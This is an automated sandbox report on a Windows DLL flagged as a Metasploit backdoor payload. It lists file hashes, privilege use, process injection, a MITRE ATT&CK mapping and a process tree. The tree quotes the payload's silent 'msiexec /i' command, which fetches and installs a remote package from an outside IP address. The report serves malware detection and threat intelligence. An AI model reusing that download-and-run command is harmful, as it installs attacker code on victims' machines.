metasploit | 12ed6d183cc130f8a7c33418013a05ffbec817a2981e987ef5931e0e9245d7c5

Analysis

max time kernel
106s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
10-09-2024 23:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

d9337ff3c22d2a4258890fd38c5e7d7f_JaffaCakes118.dll
Size

5KB
MD5

d9337ff3c22d2a4258890fd38c5e7d7f
SHA1

6dae55e6a58b612fedb42ebb73a77f9c4b932e27
SHA256

12ed6d183cc130f8a7c33418013a05ffbec817a2981e987ef5931e0e9245d7c5
SHA512

166d9dd0c11cc8d685868e976014938d1abfbb087485324f720b76002e44250309e618622461b6203ea6470dedec62002bea3bda32f4ebf7ef385c78327315ac
SSDEEP

24:ev1GSFGFajE/K3tQ3zSaJ2IkM6Pv617s3h/LjpKpuMAmwyhZojsYV:qFGFajFK3zSIe7h/TMXhZogYV

Score

10^/10

metasploit backdoor discovery trojan

Malware Config

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit

Use of msiexec (install) with remote resource 1 IoCs

pid	Process
1808	msiexec.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
4	3304	msiexec.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4860 set thread context of 3044	4860	rundll32.exe	84

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe

Suspicious use of AdjustPrivilegeToken 32 IoCs

description	pid	Process
Token: SeShutdownPrivilege	1808	msiexec.exe
Token: SeIncreaseQuotaPrivilege	1808	msiexec.exe
Token: SeSecurityPrivilege	3304	msiexec.exe
Token: SeCreateTokenPrivilege	1808	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	1808	msiexec.exe
Token: SeLockMemoryPrivilege	1808	msiexec.exe
Token: SeIncreaseQuotaPrivilege	1808	msiexec.exe
Token: SeMachineAccountPrivilege	1808	msiexec.exe
Token: SeTcbPrivilege	1808	msiexec.exe
Token: SeSecurityPrivilege	1808	msiexec.exe
Token: SeTakeOwnershipPrivilege	1808	msiexec.exe
Token: SeLoadDriverPrivilege	1808	msiexec.exe
Token: SeSystemProfilePrivilege	1808	msiexec.exe
Token: SeSystemtimePrivilege	1808	msiexec.exe
Token: SeProfSingleProcessPrivilege	1808	msiexec.exe
Token: SeIncBasePriorityPrivilege	1808	msiexec.exe
Token: SeCreatePagefilePrivilege	1808	msiexec.exe
Token: SeCreatePermanentPrivilege	1808	msiexec.exe
Token: SeBackupPrivilege	1808	msiexec.exe
Token: SeRestorePrivilege	1808	msiexec.exe
Token: SeShutdownPrivilege	1808	msiexec.exe
Token: SeDebugPrivilege	1808	msiexec.exe
Token: SeAuditPrivilege	1808	msiexec.exe
Token: SeSystemEnvironmentPrivilege	1808	msiexec.exe
Token: SeChangeNotifyPrivilege	1808	msiexec.exe
Token: SeRemoteShutdownPrivilege	1808	msiexec.exe
Token: SeUndockPrivilege	1808	msiexec.exe
Token: SeSyncAgentPrivilege	1808	msiexec.exe
Token: SeEnableDelegationPrivilege	1808	msiexec.exe
Token: SeManageVolumePrivilege	1808	msiexec.exe
Token: SeImpersonatePrivilege	1808	msiexec.exe
Token: SeCreateGlobalPrivilege	1808	msiexec.exe

Suspicious use of WriteProcessMemory 10 IoCs

description	pid	Process	procid_target
PID 1804 wrote to memory of 4860	1804	rundll32.exe	83
PID 1804 wrote to memory of 4860	1804	rundll32.exe	83
PID 1804 wrote to memory of 4860	1804	rundll32.exe	83
PID 4860 wrote to memory of 3044	4860	rundll32.exe	84
PID 4860 wrote to memory of 3044	4860	rundll32.exe	84
PID 4860 wrote to memory of 3044	4860	rundll32.exe	84
PID 4860 wrote to memory of 3044	4860	rundll32.exe	84
PID 3044 wrote to memory of 1808	3044	rundll32.exe	85
PID 3044 wrote to memory of 1808	3044	rundll32.exe	85
PID 3044 wrote to memory of 1808	3044	rundll32.exe	85

C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\d9337ff3c22d2a4258890fd38c5e7d7f_JaffaCakes118.dll,#1
1⤵
- Suspicious use of WriteProcessMemory
PID:1804
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe C:\Users\Admin\AppData\Local\Temp\d9337ff3c22d2a4258890fd38c5e7d7f_JaffaCakes118.dll,#1
  2⤵
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4860
- - C:\Windows\SysWOW64\rundll32.exe
    rundll32.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3044
  - - C:\Windows\SysWOW64\msiexec.exe
      msiexec /i http://23.227.200.242:2650/hbYDuh9tfbBfVYg7up.jpg /q
      4⤵
      Use of msiexec (install) with remote resource
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:1808

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:3304

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/3044-0-0x00000000005F0000-0x00000000005F1000-memory.dmp

Filesize
4KB

Download